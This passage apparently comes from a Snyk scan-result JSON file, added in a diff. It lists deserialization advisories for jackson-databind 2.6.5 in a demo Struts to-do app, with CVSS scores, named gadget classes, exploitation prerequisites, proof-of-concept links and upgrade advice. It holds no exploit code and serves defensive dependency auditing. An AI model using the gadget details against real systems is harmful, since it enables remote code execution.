Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.762302Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. 
Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35491" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:40:53.658144Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:40:13Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:57.453912Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "bu5yer" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2999", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-35728", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "assigner": "NVD", + "severity": 
"high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:43.478254Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", + "epssDetails": { + "percentile": "0.80006", + "probability": "0.00674", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35728" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-27T14:34:18.527699Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": 
"2020-12-27T14:05:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-27T17:34:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.852735Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": 
"https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.093517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36187" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T12:47:33.579319Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T12:44:41Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.970819Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.768509Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36184", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.169091Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36184" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:02:15.197495Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2021-01-07T16:40:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.700251Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "cvssSources": 
[ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.214306Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
